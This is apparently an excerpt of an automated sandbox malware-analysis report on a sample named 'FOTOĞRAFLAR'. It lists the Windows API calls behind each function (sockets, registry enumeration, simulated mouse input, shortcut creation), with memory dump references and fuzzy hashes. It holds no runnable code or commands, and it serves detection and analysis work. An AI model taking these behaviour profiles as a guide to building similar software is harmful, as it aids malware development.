                                                                      • Instruction Fuzzy Hash: A80186F65003087FEB10DB948D89EE7736CEB08310F405496B74AE2141EA749E844F74
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00D80899
                                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 00D808AB
                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00D808B9
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D808C7
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D808D6
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D808E6
                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00D808ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 0f8d31d5fc167846b201aa66fa06a54690d4e9ceaad7d8f62d95d19f2f865bf3
                                                                      • Instruction ID: 7b1ba7833abdcf86d4e54d318b7f2794156f4e6bc11cf017791a5fefa209dd47
                                                                      • Opcode Fuzzy Hash: 0f8d31d5fc167846b201aa66fa06a54690d4e9ceaad7d8f62d95d19f2f865bf3
                                                                      • Instruction Fuzzy Hash: EBF0EC32052712BBD7412B94EE4DBDABB79FF46712F442121F201909A0CB74A4A5CFB4
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 00D4004A
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D40066
                                                                      • __allrem.LIBCMT ref: 00D4007D
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D4009B
                                                                      • __allrem.LIBCMT ref: 00D400B2
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D400D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                      • Instruction ID: 1b46c7271699911bdade5af5ae1ad8620f17b7d432e567af278bc108921f66b2
                                                                      • Opcode Fuzzy Hash: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                      • Instruction Fuzzy Hash: 69811976A007069BE720AF39CC42B6A77E8EF55364F28413EFA51D7281EBB0D9048774
                                                                      APIs
                                                                        • Part of subcall function 00D93070: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00D930BC
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00D91CE7
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D91D08
                                                                      • WSAGetLastError.WSOCK32 ref: 00D91D19
                                                                      • inet_ntoa.WSOCK32(?), ref: 00D91DB3
                                                                      • htons.WSOCK32(?), ref: 00D91E02
                                                                      • _strlen.LIBCMT ref: 00D91E5C
                                                                        • Part of subcall function 00D73930: _strlen.LIBCMT ref: 00D7393A
                                                                        • Part of subcall function 00D18725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00D2D6D4,?,?,?), ref: 00D18741
                                                                        • Part of subcall function 00D18725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00D2D6D4,?,?,?), ref: 00D18774
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                      • String ID:
                                                                      • API String ID: 1923757996-0
                                                                      • Opcode ID: 3732edd88d0668be0ef216ca6037c43547716e91c55460b5d91b1ce8f8eee5bc
                                                                      • Instruction ID: fd9e068eaad2d526a2e11d65f2aa9be3629da7912c8d7988ebb95d89554b52b7
                                                                      • Opcode Fuzzy Hash: 3732edd88d0668be0ef216ca6037c43547716e91c55460b5d91b1ce8f8eee5bc
                                                                      • Instruction Fuzzy Hash: 89A1EF35204341AFC714EF24D895E6ABBE5EF84318F58894CF4564B2A2DB31ED85CBB2
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D38269,00D38269,?,?,?,00D463DF,00000001,00000001,8BE85006), ref: 00D461E8
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D463DF,00000001,00000001,8BE85006,?,?,?), ref: 00D4626E
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D46368
                                                                      • __freea.LIBCMT ref: 00D46375
                                                                        • Part of subcall function 00D437B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C,00DAD0D0,?,00D5242E), ref: 00D437E2
                                                                      • __freea.LIBCMT ref: 00D4637E
                                                                      • __freea.LIBCMT ref: 00D463A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 9fb951f7cbe7a7a03a86c96967a55b488198b13e04c6db0647803c6fc78a8cbd
                                                                      • Instruction ID: 3a026d74de32045ed05ce54d0a310687556bfbe60c1ce08ddd38b10edfad8faa
                                                                      • Opcode Fuzzy Hash: 9fb951f7cbe7a7a03a86c96967a55b488198b13e04c6db0647803c6fc78a8cbd
                                                                      • Instruction Fuzzy Hash: B351D072600256ABDF258F64CC89EAF77B9EB42750F1D8629FC06D6150EB34EC40C6B1
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D9C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9B5D5,?,?), ref: 00D9C8DC
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C918
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C98F
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C9C5
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9BBF1
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D9BC4C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9BC91
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D9BCC0
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D9BD1A
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D9BD26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 1120388591-0
                                                                      • Opcode ID: 3998bc9bdee0c7e547537981f3e5a065ab99a920fb5bb35d54602e2ac7269c09
                                                                      • Instruction ID: ec83ce54a9ed037b7392f42562770001a5f10eda4aeb12cea498d79f94a6fce6
                                                                      • Opcode Fuzzy Hash: 3998bc9bdee0c7e547537981f3e5a065ab99a920fb5bb35d54602e2ac7269c09
                                                                      • Instruction Fuzzy Hash: 6181BF30208241EFCB14DF24D585E2ABBE5FF84318F09495DF0594B2A2CB31ED45CBA2
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00D6F6A2
                                                                      • SysAllocString.OLEAUT32(?), ref: 00D6F749
                                                                      • VariantCopy.OLEAUT32(00D6F94D,00000000), ref: 00D6F772
                                                                      • VariantClear.OLEAUT32(00D6F94D), ref: 00D6F796
                                                                      • VariantCopy.OLEAUT32(00D6F94D,00000000), ref: 00D6F79A
                                                                      • VariantClear.OLEAUT32(?), ref: 00D6F7A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: d953ab16098e408ffb73bd3eafe70e25ffc3785aaa3562cf08620e9391117b73
                                                                      • Instruction ID: a94639c616ec2ce44c15cad6bcccd4618c6645c3eeb32f71813e2ccff05e1de3
                                                                      • Opcode Fuzzy Hash: d953ab16098e408ffb73bd3eafe70e25ffc3785aaa3562cf08620e9391117b73
                                                                      • Instruction Fuzzy Hash: 36510971600710ABCF24AB64F895729B3E9EF49710F2458B7E905EF2A1DBB0C840C7B6
                                                                      APIs
                                                                        • Part of subcall function 00D18FA0: _wcslen.LIBCMT ref: 00D18FA5
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00D89403
                                                                      • _wcslen.LIBCMT ref: 00D89424
                                                                      • _wcslen.LIBCMT ref: 00D8944B
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00D894A3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      • Opcode ID: 976009dd51a2bd374cf7059b4818f7f377cdc68ba31303e2418cf9e9d09cb9a2
                                                                      • Instruction ID: ac0a09354001d077a9d1c3268760ad75fcfab3b7d9df4586e94b3e3d5f6fd6db
                                                                      • Opcode Fuzzy Hash: 976009dd51a2bd374cf7059b4818f7f377cdc68ba31303e2418cf9e9d09cb9a2
                                                                      • Instruction Fuzzy Hash: 34E19131508350AFC724EF24D895AAAB7E1FF85314F08856DF8898B292DB31DD45CBB2
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • BeginPaint.USER32(?,?,?), ref: 00D2A6C7
                                                                      • GetWindowRect.USER32(?,?), ref: 00D2A72B
                                                                      • ScreenToClient.USER32(?,?), ref: 00D2A748
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D2A759
                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00D2A7A7
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D67BA7
                                                                        • Part of subcall function 00D2A7BF: BeginPath.GDI32(00000000), ref: 00D2A7DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      • Opcode ID: a7fbc0a0b5e1fe83f8111af44c82ebfd22070cf3f113b6e88429806374e9f2d1
                                                                      • Instruction ID: a4720484ca71c117887ea336570cb212d767827dfc024d35965d0d58653a9a19
                                                                      • Opcode Fuzzy Hash: a7fbc0a0b5e1fe83f8111af44c82ebfd22070cf3f113b6e88429806374e9f2d1
                                                                      • Instruction Fuzzy Hash: 0F4191742043109FD711DF28DC84FAA7BB8EF55328F180669F9A4CB2A2C7319945DB72
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D8072A
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00D80765
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00D80781
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00D807FA
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00D80811
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D8083F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      • Opcode ID: c83f56a9d64ce59249f49f3c45651f560d18eb2c97337ad564b02bce9d9f290c
                                                                      • Instruction ID: 50da79c68b173a40b7c435bd1c6510af3f65c8eb230f3a6c574db1c9e680e753
                                                                      • Opcode Fuzzy Hash: c83f56a9d64ce59249f49f3c45651f560d18eb2c97337ad564b02bce9d9f290c
                                                                      • Instruction Fuzzy Hash: C5415A71900204EBDF04AF54DC85AAA7BB8FF44314F1484B9ED009A296D770EE55DBB4
                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00D6767D), ref: 00DA813E
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00DA8164
                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00D6767D), ref: 00DA81C3
                                                                      • ShowWindow.USER32(00000000,00000004,?,?,?,?,00D6767D), ref: 00DA81D7
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00DA81FD
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DA8221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 5d0ef48fc94d7a9339d67c95615ab11fcb819744bd8857a1d312a40c5f6310e7
                                                                      • Instruction ID: 13461a2d93a587667683d840ac0db0535f1999b62f880804bcdb8dfae24170a7
                                                                      • Opcode Fuzzy Hash: 5d0ef48fc94d7a9339d67c95615ab11fcb819744bd8857a1d312a40c5f6310e7
                                                                      • Instruction Fuzzy Hash: 03414F34A01380EFDB25DF14D899BA57BE1EB4B314F1C4069E9598F2A2CB71A846DF60
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00D9220F
                                                                        • Part of subcall function 00D8E40C: GetWindowRect.USER32(?,?), ref: 00D8E424
                                                                      • GetDesktopWindow.USER32 ref: 00D92239
                                                                      • GetWindowRect.USER32(00000000), ref: 00D92240
                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00D9227C
                                                                      • GetCursorPos.USER32(?), ref: 00D922A8
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D92306
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                      • String ID:
                                                                      • API String ID: 2387181109-0
                                                                      • Opcode ID: 300fbc614fe7daca198181e8e57fe3b068bd3da787bb73c9b2a110dc6af6f46b
                                                                      • Instruction ID: a7c158875c01ca2cb46d979035efe5d733e29b8bf5f988bf50b4eaf88d306f51
                                                                      • Opcode Fuzzy Hash: 300fbc614fe7daca198181e8e57fe3b068bd3da787bb73c9b2a110dc6af6f46b
                                                                      • Instruction Fuzzy Hash: 5D31C272505315AFCB20DF54D849F6BBBA9FF89314F040919F489D7291DB30EA058BA6
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00D74BEB
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D74C08
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D74C40
                                                                      • _wcslen.LIBCMT ref: 00D74C5E
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D74C66
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00D74C70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      • Opcode ID: 571d86fbffbc769e932b760c50ad1da36bb89366184c4207e7df65dbf78f8b8e
                                                                      • Instruction ID: 211ac7bb051224737184b99da93ab9e04fa7b3f96efc35db56eb22378566c412
                                                                      • Opcode Fuzzy Hash: 571d86fbffbc769e932b760c50ad1da36bb89366184c4207e7df65dbf78f8b8e
                                                                      • Instruction Fuzzy Hash: 002104322042507AEB179B69AC09A7B7BACDF56760F188039F80DCA191EF64DC0096B0
                                                                      APIs
                                                                        • Part of subcall function 00D1592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15922,?,?,00D148AA,?,?,?,00000000), ref: 00D1594D
                                                                      • _wcslen.LIBCMT ref: 00D85799
                                                                      • CoInitialize.OLE32(00000000), ref: 00D858B3
                                                                      • CoCreateInstance.OLE32(00DAFD14,00000000,00000001,00DAFB84,?), ref: 00D858CC
                                                                      • CoUninitialize.OLE32 ref: 00D858EA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      • Opcode ID: eca329f39abed1acec872fa96aede5f6bd57d113a501990ebe31b22539af3bb7
                                                                      • Instruction ID: 4fe022ce3d35ffd76ce87fad93806b249ea8f69849fa3226e43ce691eda1edbf
                                                                      • Opcode Fuzzy Hash: eca329f39abed1acec872fa96aede5f6bd57d113a501990ebe31b22539af3bb7
                                                                      • Instruction Fuzzy Hash: 32D14274A047019FC714EF24D480A6ABBF5FF89714F148959F8869B361DB32EC45CBA2
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA7BD5
                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DA7BFA
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DA7C12
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00DA7C3B
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D8B6CB,00000000), ref: 00DA7C5B
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00DA7C46
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: 4ad6e2ae47e5c45ade701094b002e773626d9799e74811b84bf6f811b68ac181
